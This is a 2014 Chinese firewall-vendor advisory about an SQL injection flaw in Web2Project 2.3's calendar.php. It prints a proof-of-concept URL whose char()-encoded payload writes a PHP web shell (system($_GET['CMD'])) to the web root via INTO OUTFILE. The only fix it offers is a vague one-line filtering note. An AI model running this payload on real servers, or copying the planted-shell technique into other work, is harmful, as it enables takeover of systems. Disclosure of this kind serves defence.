Web2Project 2.3 SQL注入漏洞及修复

威盾防火墙 >> 新闻中心 >> 威盾新闻 >> Web2Project 2.3 SQL注入漏洞及修复


Web2Project 2.3 SQL注入漏洞及修复
威盾防火墙 2014-12-23

web2Project 是一个基于LAMP 开发的项目管理系统。Web2Project 2.3中的calendar.php存在SQL注入漏洞,可能导致敏感信息泄露。 [+]info: ~~~~~~~~~ Web2Project 2.3 SQL Injection Vulnerability [+]poc: ~~~~~~~~~ http://www.2cto.com/web2project-2.3/calendar.php?token=UNION//SELECT//CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62))//FROM//dual//INTO//OUTFILE../../htdocs/shell.php%23 修复：过滤该calendar.php页面

相关内容：	最新内容：
First Escort Marketing多个SQL注入漏洞及修复[2014-12-23] php远程文件包含漏洞原理[2014-12-23] SA注入拿SQL的HASH[2014-12-23] 在过滤单引号的条件下进行mssql盲注[2014-12-23] 用防盗链系统修复IIS6.0解析漏洞的技巧[2014-12-23] [攻防手记]SQL Server注入大全及防御[2014-12-20]	First Escort Marketing多个SQL注入漏洞及修复[2014-12-23] php远程文件包含漏洞原理[2014-12-23] ASP后门之终极伪装+在线琳法ASP加密解密[2014-12-23] SA注入拿SQL的HASH[2014-12-23] 在过滤单引号的条件下进行mssql盲注[2014-12-23] 突破防盗链访问WEBSHELL[2014-12-23]

电话：(010)51661195 QQ支持:2600725